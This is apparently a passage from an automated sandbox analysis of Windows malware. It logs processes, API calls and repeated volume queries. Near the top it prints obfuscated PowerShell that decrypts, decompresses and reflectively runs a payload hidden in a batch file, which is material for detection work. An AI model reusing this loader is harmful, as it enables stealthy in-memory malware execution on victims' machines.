reflection.assemblyname(''+[char](82)+'e'+'f'+''+[char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[char](68)+''+[char](101)+'l'+[char](101)+''+'g'+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+'n'+''+'m'+'e'+[char](109)+''+'o'+''+[char](114)+''+'y'+''+'m'+''+[char](111)+''+'d'+''+[char](117)+'le',$false).definetype(''+[char](77)+'yd'+'e'+''+'l'+''+[char](101)+''+'g'+'a'+[char](116)+''+[char](101)+''+'t'+''+'y'+''+'p'+''+'e'+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+'l'+''+[char](105)+''+'c'+''+','+''+[char](83)+'e'+[char](97)+'l'+'e'+''+[char](100)+''+','+''+[char](65)+''+[char](110)+''+'s'+''+'i'+'c'+[char](108)+'a'+[char](115)+''+'s'+''+','+''+'a'+''+[char](117)+'t'+[char](111)+'cla'+[char](115)+''+'s'+'',[multicastdelegate]);$khfifhqytpa.defineconstructor(''+[char](82)+''+[char](84)+''+[char](83)+'p'+[char](101)+'c'+[char](105)+'al'+[char](78)+''+'a'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+''+[char](66)+''+[char](121)+''+'s'+''+[char](105)+''+'g'+','+'p'+'u'+'b'+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$kemhnhdqclrunv).setimplementationflags(''+'r'+''+[char](117)+'n'+'t'+''+'i'+''+[char](109)+''+'e'+''+[char](44)+'m'+'a'+''+'n'+'ag'+'e'+''+[char](100)+'');$khfifhqytpa.definemethod(''+[char](73)+'n'+[char](118)+''+'o'+''+'k'+''+[char](101)+'',''+[char](80)+'u'+[char](98)+'l'+'i'+''+[char](99)+''+[char](44)+'h'+'i'+''+[char](100)+''+[char](101)+''+[char](66)+''+'y'+''+[char](83)+''+'i'+''+[char](103)+',n'+'e'+''+[char](119)+'s'+[char](108)+''+[char](111)+''+[char](116)+''+[char](44)+''+'v'+''+[char](105)+'r'+[char](116)+'ua'+[char](108)+'',$hgdpxlkyuq,$kemhnhdqclrunv).setimplementationflags(''+[char](82)+''+[char](117)+'n'+[char](116)+'i'+'m'+''+[char](101)+''+','+''+[char](77)+''+[char](97)+''+'n'+'a'+'g'+''+[char](101)+''+[char](100)+'');write-output $khfifhqytpa.createtype();}$krrkxmmjhqawa=([appdomain]::currentdomain.getassemblies()\|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+'y'+''+[char](115)+''+[char](116)+''+[char](101)+''+'m'+''+[char](46)+''+[char](100)+'ll')}).gettype(''+'m'+''+'i'+''+'c'+''+'r'+'o'+[char](115)+''+'o'+''+[char](102)+''+[char](116)+'.'+[char](87)+''+[char](105)+''+[char](110)+''+[char](51)+''+[char](50)+'.un'+[char](115)+'a'+'f'+''+'e'+'n'+[char](97)+''+[char](116)+''+'i'+''+[char](118)+''+[char](101)+''+[char](77)+''+[char](101)+''+'t'+''+[char](104)+''+'o'+''+'d'+''+'s'+'');$dozkqfpbzxnlsh=$krrkxmmjhqaw
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ntiwb($ovjgu){ $dmvwb=[system.security.cryptography.aes]::create(); $dmvwb.mode=[system.security.cryptography.ciphermode]::cbc; $dmvwb.padding=[system.security.cryptography.paddingmode]::pkcs7; $dmvwb.key=[system.convert]::frombase64string('q/epifuuitezpvuxmorjuzkedtokijbaspqpvgeuziy='); $dmvwb.iv=[system.convert]::frombase64string('2eftlv8xy+wg1xp7cznzrq=='); $bbzad=$dmvwb.createdecryptor(); $hlxqz=$bbzad.transformfinalblock($ovjgu, 0, $ovjgu.length); $bbzad.dispose(); $dmvwb.dispose(); $hlxqz;}function hckuz($ovjgu){ invoke-expression '$vrbtd=new-object onisoniyonisonitonieonimoni.oniioniooni.onimonieonimonioonironiystonironieoniamoni(,$ovjgu);'.replace('oni', ''); invoke-expression '$gbzbj=new-object onisoniyonisonitonieonim.oniioniooni.monieonimonioonironiyonisonitonironieoniaonimoni;'.replace('oni', ''); invoke-expression '$qvkjb=new-object soniyonisonitonieonimoni.oniioniooni.oniconioonimoniponironieonissoniiooninoni.gonizioniponisonitonironieoniaonimoni($vrbtd, [oniioniooni.oniconioonimoniponironieonisonisoniioniooninoni.oniconioonimoniponironieonisonisoniioniooninonimonioonidonieoni]::donieconiomoniproniesonis);'.replace('oni', ''); $qvkjb.copyto($gbzbj); $qvkjb.dispose(); $vrbtd.dispose(); $gbzbj.dispose(); $gbzbj.toarray();}function ufdah($ovjgu,$fjsel){ invoke-expression '$qhidz=oni[onisoniyonisonitonieonimoni.onironieonifonilonieoniconitoniioniooninoni.oniaonisonisonieonimoniboniloniyoni]oni::oniloniooniaonidoni([byte[]]$ovjgu);'.replace('oni', ''); invoke-expression '$enoqz=$qhidz.onieoninonitonironiyoniponiooniioninonitoni;'.replace('oni', ''); invoke-expression '$enoqz.oniioninonivonioonikonieoni(oni$oninoniuoniloniloni, $fjsel)oni;'.replace('oni', '');}$dnwgy = 'c:\users\user\desktop\q5n7wopk8j.bat';$host.ui.rawui.windowtitle = $dnwgy;$ymrtg=[system.io.file]::readalltext($dnwgy).split([environment]::newline);foreach ($kglhr in $ymrtg) { if ($kglhr.startswith(':: ')) { $qobbt=$kglhr.substring(3); break; }}$ucmwf=[string[]]$qobbt.split('\');invoke-expression '$ooasd=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[0])));'.replace('oni', '');invoke-expression '$owbfa=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[1])));'.replace('oni', '');ufdah $ooasd $null;ufdah $owbfa (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ntiwb($ovjgu){ $dmvwb=[system.security.cryptography.aes]::create(); $dmvwb.mode=[system.security.cryptography.ciphermode]::cbc; $dmvwb.padding=[system.security.cryptography.paddingmode]::pkcs7; $dmvwb.key=[system.convert]::frombase64string('q/epifuuitezpvuxmorjuzkedtokijbaspqpvgeuziy='); $dmvwb.iv=[system.convert]::frombase64string('2eftlv8xy+wg1xp7cznzrq=='); $bbzad=$dmvwb.createdecryptor(); $hlxqz=$bbzad.transformfinalblock($ovjgu, 0, $ovjgu.length); $bbzad.dispose(); $dmvwb.dispose(); $hlxqz;}function hckuz($ovjgu){ invoke-expression '$vrbtd=new-object onisoniyonisonitonieonimoni.oniioniooni.onimonieonimonioonironiystonironieoniamoni(,$ovjgu);'.replace('oni', ''); invoke-expression '$gbzbj=new-object onisoniyonisonitonieonim.oniioniooni.monieonimonioonironiyonisonitonironieoniaonimoni;'.replace('oni', ''); invoke-expression '$qvkjb=new-object soniyonisonitonieonimoni.oniioniooni.oniconioonimoniponironieonissoniiooninoni.gonizioniponisonitonironieoniaonimoni($vrbtd, [oniioniooni.oniconioonimoniponironieonisonisoniioniooninoni.oniconioonimoniponironieonisonisoniioniooninonimonioonidonieoni]::donieconiomoniproniesonis);'.replace('oni', ''); $qvkjb.copyto($gbzbj); $qvkjb.dispose(); $vrbtd.dispose(); $gbzbj.dispose(); $gbzbj.toarray();}function ufdah($ovjgu,$fjsel){ invoke-expression '$qhidz=oni[onisoniyonisonitonieonimoni.onironieonifonilonieoniconitoniioniooninoni.oniaonisonisonieonimoniboniloniyoni]oni::oniloniooniaonidoni([byte[]]$ovjgu);'.replace('oni', ''); invoke-expression '$enoqz=$qhidz.onieoninonitonironiyoniponiooniioninonitoni;'.replace('oni', ''); invoke-expression '$enoqz.oniioninonivonioonikonieoni(oni$oninoniuoniloniloni, $fjsel)oni;'.replace('oni', '');}$dnwgy = 'c:\windows\$cnt-onimai2\$cnt-co2.bat';$host.ui.rawui.windowtitle = $dnwgy;$ymrtg=[system.io.file]::readalltext($dnwgy).split([environment]::newline);foreach ($kglhr in $ymrtg) { if ($kglhr.startswith(':: ')) { $qobbt=$kglhr.substring(3); break; }}$ucmwf=[string[]]$qobbt.split('\');invoke-expression '$ooasd=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[0])));'.replace('oni', '');invoke-expression '$owbfa=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[1])));'.replace('oni', '');ufdah $ooasd $null;ufdah $owbfa (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

37_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

37_2_0000000140002300

Source: dwm.exe, 00000029.00000000.1761597762.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.2615732842.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerd
Source: conhost.exe, 00000016.00000002.2550727670.00000166BC350000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2568272227.0000022F1C800000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.1740126086.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000016.00000002.2550727670.00000166BC350000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2568272227.0000022F1C800000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.1740126086.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000016.00000002.2550727670.00000166BC350000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2568272227.0000022F1C800000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.1740126086.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: conhost.exe, 00000016.00000002.2550727670.00000166BC350000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2568272227.0000022F1C800000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.1740126086.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\cmd.exe

Code function: 21_3_000001F1197A2AF0 cpuid

21_3_000001F1197A2AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
